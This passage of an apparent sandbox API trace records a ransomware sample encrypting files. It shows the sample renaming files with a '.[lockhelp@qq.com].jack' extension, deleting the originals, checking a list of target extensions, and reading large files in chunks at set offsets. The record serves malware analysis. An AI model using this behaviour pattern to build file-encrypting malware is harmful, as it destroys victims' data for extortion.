[0197.499] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.499] GetLastError () returned 0x0 [0197.499] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x37e, lpOverlapped=0x0) returned 1 [0197.529] WriteFile (in: hFile=0x420, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x380, lpOverlapped=0x0) returned 1 [0197.530] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.530] WriteFile (in: hFile=0x420, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xea, lpOverlapped=0x0) returned 1 [0197.530] SetEndOfFile (hFile=0x420) returned 1 [0197.531] CloseHandle (hObject=0x420) returned 1 [0197.533] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.533] SetEndOfFile (hFile=0x3f0) returned 1 [0197.534] CloseHandle (hObject=0x3f0) returned 1 [0197.534] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.534] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico")) returned 1 [0197.549] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.549] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.549] lstrlenW (lpString=".doc") returned 4 [0197.549] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.549] lstrlenW (lpString=".docx") returned 5 [0197.549] lstrcmpiW (lpString1=".docx", lpString2="6.ico") returned -1 [0197.549] lstrlenW (lpString=".pdf") returned 4 [0197.549] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.549] lstrlenW (lpString=".xls") returned 4 [0197.549] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.549] lstrlenW (lpString=".xlsx") returned 5 [0197.549] lstrcmpiW (lpString1=".xlsx", lpString2="6.ico") returned -1 [0197.549] lstrlenW (lpString=".ppt") returned 4 [0197.549] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.549] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.549] lstrlenW (lpString=".zip") returned 4 [0197.549] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.549] lstrlenW (lpString=".rar") returned 4 [0197.549] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.549] lstrlenW (lpString=".bz2") returned 4 [0197.549] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.549] lstrlenW (lpString=".7z") returned 3 [0197.549] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.549] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.549] lstrlenW (lpString=".dbf") returned 4 [0197.549] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.549] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.549] lstrlenW (lpString=".1cd") returned 4 [0197.549] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.550] lstrlenW (lpString=".jpg") returned 4 [0197.550] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.550] lstrlenW (lpString=".doc") returned 4 [0197.550] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.550] lstrlenW (lpString=".docx") returned 5 [0197.550] lstrcmpiW (lpString1=".docx", lpString2="6.ico") returned -1 [0197.550] lstrlenW (lpString=".pdf") returned 4 [0197.550] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.550] lstrlenW (lpString=".xls") returned 4 [0197.550] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.550] lstrlenW (lpString=".xlsx") returned 5 [0197.550] lstrcmpiW (lpString1=".xlsx", lpString2="6.ico") returned -1 [0197.550] lstrlenW (lpString=".ppt") returned 4 [0197.550] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.550] lstrlenW (lpString=".zip") returned 4 [0197.550] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.550] lstrlenW (lpString=".rar") returned 4 [0197.550] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.550] lstrlenW (lpString=".bz2") returned 4 [0197.550] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.550] lstrlenW (lpString=".7z") returned 3 [0197.550] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.550] lstrlenW (lpString=".dbf") returned 4 [0197.551] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.551] lstrlenW (lpString=".1cd") returned 4 [0197.551] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0197.551] lstrlenW (lpString=".jpg") returned 4 [0197.551] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.551] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.551] lstrlenW (lpString="Save.ico") returned 8 [0197.551] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.552] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=1150) returned 1 [0197.552] CloseHandle (hObject=0x41c) returned 1 [0197.552] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico")) returned 0x80 [0197.553] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.554] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.554] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.554] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.554] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4 [0197.732] GetLastError () returned 0x0 [0197.732] ReadFile (in: hFile=0x408, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x47e, lpOverlapped=0x0) returned 1 [0197.775] WriteFile (in: hFile=0x3c4, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x480, lpOverlapped=0x0) returned 1 [0197.776] ReadFile (in: hFile=0x408, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.776] WriteFile (in: hFile=0x3c4, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.776] SetEndOfFile (hFile=0x3c4) returned 1 [0197.777] CloseHandle (hObject=0x3c4) returned 1 [0197.778] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.778] SetEndOfFile (hFile=0x408) returned 1 [0197.779] CloseHandle (hObject=0x408) returned 1 [0197.779] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.779] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico")) returned 1 [0197.779] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.779] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.779] lstrlenW (lpString=".doc") returned 4 [0197.779] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.779] lstrlenW (lpString=".docx") returned 5 [0197.779] lstrcmpiW (lpString1=".docx", lpString2="e.ico") returned -1 [0197.779] lstrlenW (lpString=".pdf") returned 4 [0197.779] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.779] lstrlenW (lpString=".xls") returned 4 [0197.779] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.779] lstrlenW (lpString=".xlsx") returned 5 [0197.779] lstrcmpiW (lpString1=".xlsx", lpString2="e.ico") returned -1 [0197.779] lstrlenW (lpString=".ppt") returned 4 [0197.780] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.780] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.780] lstrlenW (lpString=".zip") returned 4 [0197.780] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.780] lstrlenW (lpString=".rar") returned 4 [0197.780] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.780] lstrlenW (lpString=".bz2") returned 4 [0197.780] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.780] lstrlenW (lpString=".7z") returned 3 [0197.780] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.780] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.780] lstrlenW (lpString=".dbf") returned 4 [0197.780] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.780] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.780] lstrlenW (lpString=".1cd") returned 4 [0197.780] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.780] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.780] lstrlenW (lpString=".jpg") returned 4 [0197.780] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.780] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.780] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.780] lstrlenW (lpString=".doc") returned 4 [0197.780] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.780] lstrlenW (lpString=".docx") returned 5 [0197.780] lstrcmpiW (lpString1=".docx", lpString2="e.ico") returned -1 [0197.780] lstrlenW (lpString=".pdf") returned 4 [0197.780] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.780] lstrlenW (lpString=".xls") returned 4 [0197.780] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.780] lstrlenW (lpString=".xlsx") returned 5 [0197.780] lstrcmpiW (lpString1=".xlsx", lpString2="e.ico") returned -1 [0197.780] lstrlenW (lpString=".ppt") returned 4 [0197.780] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.780] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.780] lstrlenW (lpString=".zip") returned 4 [0197.780] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.780] lstrlenW (lpString=".rar") returned 4 [0197.781] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.781] lstrlenW (lpString=".bz2") returned 4 [0197.781] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.781] lstrlenW (lpString=".7z") returned 3 [0197.781] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.781] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.781] lstrlenW (lpString=".dbf") returned 4 [0197.781] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.781] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.781] lstrlenW (lpString=".1cd") returned 4 [0197.781] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.781] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0197.781] lstrlenW (lpString=".jpg") returned 4 [0197.781] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.781] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.781] lstrlenW (lpString="warn.ico") returned 8 [0197.781] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.781] GetFileSizeEx (in: hFile=0x408, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=10134) returned 1 [0197.781] CloseHandle (hObject=0x408) returned 1 [0197.781] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico")) returned 0x80 [0197.781] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.782] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.782] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.782] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.782] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4 [0197.782] GetLastError () returned 0x0 [0197.782] ReadFile (in: hFile=0x408, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x2796, lpOverlapped=0x0) returned 1 [0197.796] WriteFile (in: hFile=0x3c4, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x27a0, lpOverlapped=0x0) returned 1 [0197.797] ReadFile (in: hFile=0x408, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.797] WriteFile (in: hFile=0x3c4, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.797] SetEndOfFile (hFile=0x3c4) returned 1 [0197.797] CloseHandle (hObject=0x3c4) returned 1 [0197.798] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.798] SetEndOfFile (hFile=0x408) returned 1 [0197.799] CloseHandle (hObject=0x408) returned 1 [0197.799] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.799] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico")) returned 1 [0197.799] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.799] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.799] lstrlenW (lpString=".doc") returned 4 [0197.799] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.799] lstrlenW (lpString=".docx") returned 5 [0197.799] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0197.799] lstrlenW (lpString=".pdf") returned 4 [0197.799] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.800] lstrlenW (lpString=".xls") returned 4 [0197.800] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.800] lstrlenW (lpString=".xlsx") returned 5 [0197.800] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0197.800] lstrlenW (lpString=".ppt") returned 4 [0197.800] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.800] lstrlenW (lpString=".zip") returned 4 [0197.800] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.800] lstrlenW (lpString=".rar") returned 4 [0197.800] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.800] lstrlenW (lpString=".bz2") returned 4 [0197.800] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.800] lstrlenW (lpString=".7z") returned 3 [0197.800] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.800] lstrlenW (lpString=".dbf") returned 4 [0197.800] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.800] lstrlenW (lpString=".1cd") returned 4 [0197.800] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.800] lstrlenW (lpString=".jpg") returned 4 [0197.800] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.800] lstrlenW (lpString=".doc") returned 4 [0197.800] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.800] lstrlenW (lpString=".docx") returned 5 [0197.800] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0197.800] lstrlenW (lpString=".pdf") returned 4 [0197.800] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.800] lstrlenW (lpString=".xls") returned 4 [0197.800] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.800] lstrlenW (lpString=".xlsx") returned 5 [0197.800] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0197.800] lstrlenW (lpString=".ppt") returned 4 [0197.801] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.801] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.801] lstrlenW (lpString=".zip") returned 4 [0197.801] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.801] lstrlenW (lpString=".rar") returned 4 [0197.801] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.801] lstrlenW (lpString=".bz2") returned 4 [0197.801] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.801] lstrlenW (lpString=".7z") returned 3 [0197.801] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.801] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.801] lstrlenW (lpString=".dbf") returned 4 [0197.801] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.801] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.801] lstrlenW (lpString=".1cd") returned 4 [0197.801] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.801] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0197.801] lstrlenW (lpString=".jpg") returned 4 [0197.801] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.801] Sleep (dwMilliseconds=0x64) [0198.326] lstrcmpiW (lpString1=".mzz", lpString2=".jack") returned 1 [0198.326] lstrlenW (lpString="netfx_Extended.mzz") returned 18 [0198.326] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0198.327] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=43131591) returned 1 [0198.327] CloseHandle (hObject=0x3f0) returned 1 [0198.327] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz")) returned 0x20 [0198.327] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.327] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id-b4197730.[lockhelp@qq.com].jack")) returned 1 [0198.328] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0198.328] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fc64 | out: lpNewFilePointer=0x0) returned 1 [0198.328] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fc24 | out: lpNewFilePointer=0x0) returned 1 [0198.328] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x341fc30, lpOverlapped=0x0 | out: lpBuffer=0x4117058*, lpNumberOfBytesRead=0x341fc30*=0x40000, lpOverlapped=0x0) returned 1 [0198.333] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0xdb60ed, lpNewFilePointer=0x0, dwMoveMethod=0x341fc24 | out: lpNewFilePointer=0x0) returned 1 [0198.333] ReadFile (in: hFile=0x3f0, lpBuffer=0x4157058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x341fc30, lpOverlapped=0x0 | out: lpBuffer=0x4157058*, lpNumberOfBytesRead=0x341fc30*=0x40000, lpOverlapped=0x0) returned 1 [0198.336] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x341fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0198.336] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x28e22c7, lpNewFilePointer=0x0, dwMoveMethod=0x341fc24 | out: lpNewFilePointer=0x0) returned 1 [0198.336] ReadFile (in: hFile=0x3f0, lpBuffer=0x4197058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x341fc30, lpOverlapped=0x0 | out: lpBuffer=0x4197058*, lpNumberOfBytesRead=0x341fc30*=0x40000, lpOverlapped=0x0) returned 1 [0198.376] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.377] WriteFile (hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToWrite=0xc0110, lpNumberOfBytesWritten=0x341fca8, lpOverlapped=0x0) Thread: id = 19 os_tid = 0xb84 [0195.713] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3f20930 [0195.714] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3f30938 [0195.714] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378998 [0195.714] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x65aa10 [0195.714] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x23789b0 [0195.715] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x4229020 [0195.718] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x23789e0 [0195.718] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x23789e0, Size=0x20) returned 